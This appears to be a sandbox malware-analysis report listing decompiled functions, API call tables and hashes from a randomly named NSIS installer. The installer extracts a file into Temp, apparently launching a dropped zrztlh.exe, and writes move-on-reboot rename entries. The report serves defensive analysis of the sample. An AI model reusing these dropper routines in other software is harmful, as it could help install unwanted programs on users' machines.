				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423f28; // 0x74d188
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "xwkwrbeiqiuu Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x423f24; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                0x0040100a
                0x00401039
                0x00401047
                0x0040104d
                0x00401051
                0x0040105b
                0x00401061
                0x00401064
                0x004010f3
                0x00401089
                0x0040108c
                0x004010a6
                0x004010bd
                0x004010cc
                0x004010cf
                0x004010d5
                0x004010d9
                0x004010e4
                0x004010ed
                0x004010ef
                0x004010ef
                0x00401100
                0x00401105
                0x0040110d
                0x00401110
                0x00401112
                0x00401118
                0x0040111f
                0x00401126
                0x00401130
                0x00401142
                0x00401156
                0x00401160
                0x00401165
                0x00401165
                0x00401110
                0x0040116e
                0x00000000
                0x00401178
                0x00401010
                0x00401013
                0x00401015
                0x00401019
                0x0040101f
                0x0040101f
                0x00000000

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,?), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,xwkwrbeiqiuu Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$xwkwrbeiqiuu Setup
                • API String ID: 941294808-2097528622
                • Opcode ID: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                • Instruction ID: 28e048358fdb56e3a71f0bf3a5ff7a413e245bc8018749bf15ad205f69265f0b
                • Opcode Fuzzy Hash: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                • Instruction Fuzzy Hash: 4241BA71804249AFCB058FA4DD459BFBBB9FF48315F00802AF951AA1A0C738AA50DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405842 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00405842() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DDA(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fb0 =  *0x423fb0 + 1;
						return _t20;
					}
				}
				 *0x4226c0 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422138, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d38, "%s=%s\r\n", 0x4226c0, 0x422138);
						_t18 =  *0x423f28; // 0x74d188
						_t56 = _t55 + 0x10;
						_push( *((intOrPtr*)(_t18 + 0x128)));
						_push(0x422138);
						E00405B16(_t43, 0x400, 0x422138);
						_t20 = E004057CB(0x422138, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405740(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405740(_t26 + 0xa, 0x4093a0);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040578C(_t51 + _t29, 0x421d38, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405AF4(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004057CB(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                0x00405848
                0x0040584f
                0x00405853
                0x0040585c
                0x00405860
                0x0040599f
                0x0040599f
                0x00000000
                0x0040599f
                0x00405860
                0x0040586c
                0x00405882
                0x004058aa
                0x004058b5
                0x004058b9
                0x004058d9
                0x004058db
                0x004058e0
                0x004058e3
                0x004058e9
                0x004058ea
                0x004058f7
                0x004058fc
                0x00405901
                0x00405905
                0x00000000
                0x00000000
                0x00405914
                0x00405916
                0x00405923
                0x00405927
                0x00405998
                0x00405999
                0x00000000
                0x00405943
                0x00405950
                0x004059b5
                0x004059bc
                0x00405963
                0x00405963
                0x00405965
                0x0040596e
                0x00405979
                0x0040598b
                0x00405992
                0x00000000
                0x00405992
                0x004059be
                0x004059bf
                0x004059c4
                0x004059c6
                0x004059d3
                0x004059d3
                0x004059d7
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004059c8
                0x004059c8
                0x004059cb
                0x004059ce
                0x004059cf
                0x00000000
                0x004059c8
                0x0040595b
                0x00405960
                0x00000000
                0x00405960
                0x00405927
                0x00405884
                0x0040588f
                0x00405898
                0x0040589c
                0x00000000
                0x00000000
                0x0040589c
                0x004059a9

                APIs
                  • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                  • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DF7
                  • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245), ref: 00405E08
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 0040588F
                • GetShortPathNameA.KERNEL32 ref: 00405898
                • GetShortPathNameA.KERNEL32 ref: 004058B5
                • wsprintfA.USER32 ref: 004058D3
                • GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D38,00000000,-0000000A,004093A0,00000000,[Rename]), ref: 00405979
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040598B
                • GlobalFree.KERNEL32 ref: 00405992
                • CloseHandle.KERNEL32(00000000), ref: 00405999
                  • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                  • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                • String ID: %s=%s$8!B$[Rename]
                • API String ID: 3772915668-1989604195
                • Opcode ID: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                • Instruction ID: 485c0dd97f26b0c044a9bc16f28733e4b9e22d15a5ab270111e081fcc94942a4
                • Opcode Fuzzy Hash: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                • Instruction Fuzzy Hash: 6F4102B1604B01BBE7206B659D49F6B3A6CDF45725F04043AFA05F62D1E67CA8018EBE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405B16 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 170stringCOMMON
                Download Yara Rule
                C-Code - Quality: 74%
                			E00405B16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _t30;
				CHAR* _t31;
				signed int _t33;
				signed int _t34;
				signed int _t45;
				char _t47;
				CHAR* _t57;
				char _t61;
				signed int _t63;
				intOrPtr _t67;
				signed int _t75;
				char* _t76;
				signed int _t84;
				signed int _t86;
				void* _t87;

				_t75 = _a8;
				if(_t75 < 0) {
					_t67 =  *0x4236fc; // 0x74f2a0
					_t75 =  *(_t67 - 4 + _t75 * 4);
				}
				_t30 =  *0x423f58; // 0x74eb84
				_t76 = _t75 + _t30;
				_t31 = 0x422ec0;
				_t57 = 0x422ec0;
				if(_a4 - 0x422ec0 < 0x800) {
					_t57 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t61 =  *_t76;
					_a11 = _t61;
					if(_t61 == 0) {
						break;
					}
					__eflags = _t57 - _t31 - 0x400;
					if(_t57 - _t31 >= 0x400) {
						break;
					}
					_t76 = _t76 + 1;
					__eflags = _t61 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t57 = _t61;
							_t57 =  &(_t57[1]);
							__eflags = _t57;
						} else {
							 *_t57 =  *_t76;
							_t57 =  &(_t57[1]);
							_t76 = _t76 + 1;
						}
						continue;
					}
					_t33 =  *((char*)(_t76 + 1));
					_t63 =  *_t76;
					_t84 = (_t33 & 0x0000007f) << 0x00000007 | _t63 & 0x0000007f;
					_v24 = _t63;
					_v16 = _t33;
					_t34 = _t33 | 0x00008000;
					_v20 = _t63 | 0x00008000;
					_t76 = _t76 + 2;
					__eflags = _a11 - 0xfe;
					_v12 = _t34;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t34 | 0xffffffff) - _t84;
								E00405B16(_t57, _t76, _t84, _t57, (_t34 | 0xffffffff) - _t84);
							}
							L32:
							_t57 =  &(_t57[lstrlenA(_t57)]);
							_t31 = 0x422ec0;
							continue;
						}
						__eflags = _t84 - 0x1d;
						if(_t84 != 0x1d) {
							__eflags = (_t84 << 0xa) + 0x424000;
							E00405AF4(_t57, (_t84 << 0xa) + 0x424000);
						} else {
							E00405A52(_t57,  *0x423f24);
						}
						__eflags = _t84 + 0xffffffeb - 7;
						if(_t84 + 0xffffffeb < 7) {
							L23:
							E00405D03(_t57);
						}
						goto L32;
					}
					__eflags =  *0x423fa4;
					_t86 = 2;
					if( *0x423fa4 != 0) {
						_t86 = 4;
					}
					_t45 = _v24;
					__eflags = _t45;
					if(_t45 >= 0) {
						__eflags = _t45 - 0x25;
						if(_t45 != 0x25) {
							__eflags = _t45 - 0x24;
							if(_t45 == 0x24) {
								GetWindowsDirectoryA(_t57, 0x400);
								_t86 = 0;
							}
							while(1) {
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								_t86 = _t86 - 1;
								_t47 = SHGetSpecialFolderLocation( *0x423f24,  *(_t87 + _t86 * 4 - 0x14),  &_v8);
								__eflags = _t47;
								if(_t47 != 0) {
									L18:
									 *_t57 =  *_t57 & 0x00000000;
									__eflags =  *_t57;
									continue;
								}
								__imp__SHGetPathFromIDListA(_v8, _t57);
								_a8 = _t47;
								__imp__CoTaskMemFree(_v8);
								__eflags = _a8;
								if(_a8 != 0) {
									break;
								}
								goto L18;
							}
							L20:
							__eflags =  *_t57;
							if( *_t57 == 0) {
								goto L23;
							}
							L21:
							__eflags = _v16 - 0x1a;
							if(_v16 == 0x1a) {
								lstrcatA(_t57, "\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							goto L23;
						}
						GetSystemDirectoryA(_t57, 0x400);
						goto L20;
					}
					E004059DB(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t45 & 0x0000003f) +  *0x423f58, _t57, _t45 & 0x00000040);
					__eflags =  *_t57;
					if( *_t57 != 0) {
						goto L21;
					}
					E00405B16(_t57, _t76, _t86, _t57, _v16);
					goto L20;
				}
				 *_t57 =  *_t57 & 0x00000000;
				if(_a4 == 0) {
					return _t31;
				}
				return E00405AF4(_a4, _t31);
			}























                0x00405b1f
                0x00405b24
                0x00405b26
                0x00405b35
                0x00405b35
                0x00405b37
                0x00405b3f
                0x00405b41
                0x00405b48
                0x00405b50
                0x00405b56
                0x00405b59
                0x00405b59
                0x00405cdd
                0x00405cdd
                0x00405ce1
                0x00405ce4
                0x00000000
                0x00000000
                0x00405b66
                0x00405b6c
                0x00000000
                0x00000000
                0x00405b72
                0x00405b73
                0x00405b76
                0x00405cd0
                0x00405cda
                0x00405cdc
                0x00405cdc
                0x00405cd2
                0x00405cd4
                0x00405cd6
                0x00405cd7
                0x00405cd7
                0x00000000
                0x00405cd0
                0x00405b7c
                0x00405b80
                0x00405b90
                0x00405b97
                0x00405b9a
                0x00405b9f
                0x00405ba2
                0x00405ba5
                0x00405ba6
                0x00405baa
                0x00405bad
                0x00405c7b
                0x00405c7f
                0x00405caf
                0x00405cb3
                0x00405cb8
                0x00405cbc
                0x00405cbc
                0x00405cc1
                0x00405cc7
                0x00405cc9
                0x00000000
                0x00405cc9
                0x00405c81
                0x00405c84
                0x00405c99
                0x00405ca0
                0x00405c86
                0x00405c8d
                0x00405c8d
                0x00405ca8
                0x00405cab
                0x00405c73
                0x00405c74
                0x00405c74
                0x00000000
                0x00405cab
                0x00405bb3
                0x00405bbc
                0x00405bbd
                0x00405bc1
                0x00405bc1
                0x00405bc2
                0x00405bc5
                0x00405bc7
                0x00405bf9
                0x00405bfc
                0x00405c0c
                0x00405c0f
                0x00405c17
                0x00405c1d
                0x00405c1d
                0x00405c59
                0x00405c59
                0x00405c5b
                0x00000000
                0x00000000
                0x00405c24
                0x00405c30
                0x00405c36
                0x00405c38
                0x00405c56
                0x00405c56
                0x00405c56
                0x00000000
                0x00405c56
                0x00405c3e
                0x00405c47
                0x00405c4a
                0x00405c50
                0x00405c54
                0x00000000
                0x00000000
                0x00000000
                0x00405c54
                0x00405c5d
                0x00405c5d
                0x00405c60
                0x00000000
                0x00000000
                0x00405c62
                0x00405c62
                0x00405c66
                0x00405c6e
                0x00405c6e
                0x00000000
                0x00405c66
                0x00405c04
                0x00000000
                0x00405c04
                0x00405be4
                0x00405be9
                0x00405bec
                0x00000000
                0x00000000
                0x00405bf2
                0x00000000
                0x00405bf2
                0x00405cea
                0x00405cf4
                0x00405d00
                0x00405d00
                0x00000000

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 00405C04
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000400,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405C17
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C6E
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405CC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Directory$SystemWindowslstrcatlstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\zrztlh.exe C:\Users\user\AppData\Local\Temp\kplemx$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 4260037668-1677557876
                • Opcode ID: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                • Instruction ID: fbd4eb8f0a1d10871977b41ef6ccbc0aa49b8648b95f2323881667dae7feb8a3
                • Opcode Fuzzy Hash: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                • Instruction Fuzzy Hash: 955146B1E08B54ABEF215F748D84B6B3BA8DB11314F248277E512B62C1D23C99419F5D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004026DF Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102memoryfilestringCOMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E004026DF(void __ecx, void* __eflags) {
				void* _t23;
				void* _t29;
				long _t34;
				struct _OVERLAPPED* _t49;
				void* _t52;
				void* _t54;
				void* _t55;
				CHAR* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t51 = __ecx;
				 *((intOrPtr*)(_t61 - 0x3c)) = 0xfffffd66;
				_t55 = E00402A85(_t49);
				_t23 = E00405654(_t55);
				_push(_t55);
				if(_t23 == 0) {
					lstrcatA(E004055E7(E00405AF4("C:\Users\alfons\AppData\Local\Temp", "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
					_t56 = 0x4097f8;
				} else {
					_push(0x4097f8);
					E00405AF4();
				}
				E00405D03(_t56);
				E004057AC(_t56);
				_t29 = E004057CB(_t56, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t34 =  *0x423f2c; // 0x7e00
					 *(_t61 - 0x2c) = _t34;
					_t54 = GlobalAlloc(0x40, _t34);
					if(_t54 != _t49) {
						E004032AF(_t49);
						E0040327D(_t54,  *(_t61 - 0x2c));
						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
						 *(_t61 - 0x30) = _t59;
						if(_t59 != _t49) {
							E00402F71(_t51,  *((intOrPtr*)(_t61 - 0x20)), _t49, _t59,  *(_t61 - 0x1c));
							while( *_t59 != _t49) {
								_t51 =  *_t59;
								_t60 = _t59 + 8;
								 *(_t61 - 0x40) =  *_t59;
								E0040578C( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
								_t59 = _t60 +  *(_t61 - 0x40);
							}
							GlobalFree( *(_t61 - 0x30));
						}
						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x34, _t49);
						GlobalFree(_t54);
						 *((intOrPtr*)(_t61 - 0x3c)) = E00402F71(_t51, 0xffffffff,  *(_t61 + 8), _t49, _t49);
					}
					CloseHandle( *(_t61 + 8));
					_t56 = 0x4097f8;
				}
				_t52 = 0xfffffff3;
				if( *((intOrPtr*)(_t61 - 0x3c)) < _t49) {
					_t52 = 0xffffffef;
					DeleteFileA(_t56);
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t52);
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}














                0x004026df
                0x004026e0
                0x004026ec
                0x004026ef
                0x004026f6
                0x004026f7
                0x0040271c
                0x00402721
                0x004026f9
                0x004026fe
                0x004026ff
                0x004026ff
                0x00402727
                0x0040272d
                0x0040273a
                0x00402742
                0x00402745
                0x0040274b
                0x00402759
                0x0040275e
                0x00402762
                0x00402765
                0x0040276e
                0x0040277a
                0x0040277e
                0x00402781
                0x0040278b
                0x004027aa
                0x00402792
                0x00402797
                0x0040279f
                0x004027a2
                0x004027a7
                0x004027a7
                0x004027b1
                0x004027b1
                0x004027c3
                0x004027ca
                0x004027dc
                0x004027dc
                0x004027e2
                0x004027e8
                0x004027e8
                0x004027f2
                0x004027f3
                0x004027f7
                0x004027f9
                0x004027ff
                0x004027ff
                0x00402806
                0x004021ba
                0x0040291d
                0x00402929

                APIs
                • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040271C
                • GlobalAlloc.KERNEL32(00000040,00007E00,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040275C
                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402778
                • GlobalFree.KERNEL32 ref: 004027B1
                • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027C3
                • GlobalFree.KERNEL32 ref: 004027CA
                • CloseHandle.KERNEL32(?), ref: 004027E2
                • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 004027F9
                  • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,xwkwrbeiqiuu Setup,NSIS Error), ref: 00405B01
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                • API String ID: 3508600917-4142310990
                • Opcode ID: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                • Instruction ID: fcc06673606a62174d5ec44ae6416698489d1e6bc37419cb4e18d2f49fa452d4
                • Opcode Fuzzy Hash: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                • Instruction Fuzzy Hash: 8A317A72C00524BBCB116FA5CD89DAF7A78EF08364B10823AF924772D1CB7C5C019BA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BCA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402BCA(struct HWND__* _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t5;
				int _t7;
				CHAR* _t9;
				int _t18;
				int _t19;
				struct HWND__* _t23;
				void* _t24;

				_t5 = _a8;
				_t23 = _a4;
				if(_t5 == 0x110) {
					SetTimer(_t23, 1, 0xfa, 0);
					 *0x40b000 = _a12;
					_t5 = 0x113;
				}
				if(_t5 == 0x113) {
					_t19 =  *0x4170d0; // 0x0
					_t7 =  *0x41f0e0;
					if(_t19 >= _t7) {
						_t19 = _t7;
					}
					_t18 = MulDiv(_t19, 0x64, _t7);
					_t9 =  *0x40b000; // 0x0
					if(_t9 != 0) {
						wsprintfA(0x417090, _t9, _t18);
						_t24 = _t24 + 0xc;
						SetWindowTextA(_t23, 0x417090);
						SetDlgItemTextA(_t23, 0x406, 0x417090);
						ShowWindow(_t23, 5);
					}
					if(( *0x409250 & 0x00000001) != 0) {
						wsprintfA(0x417090, "... %d%%", _t18);
						E00404E9F(0, 0x417090);
					}
				}
				return 0;
			}










                0x00402bca
                0x00402bd0
                0x00402be0
                0x00402bec
                0x00402bf6
                0x00402bfb
                0x00402bfb
                0x00402bff
                0x00402c01
                0x00402c07
                0x00402c0e
                0x00402c10
                0x00402c10
                0x00402c22
                0x00402c24
                0x00402c30
                0x00402c35
                0x00402c37
                0x00402c3c
                0x00402c49
                0x00402c51
                0x00402c51
                0x00402c5e
                0x00402c67
                0x00402c6f
                0x00402c6f
                0x00402c5e
                0x00402c7a

                APIs
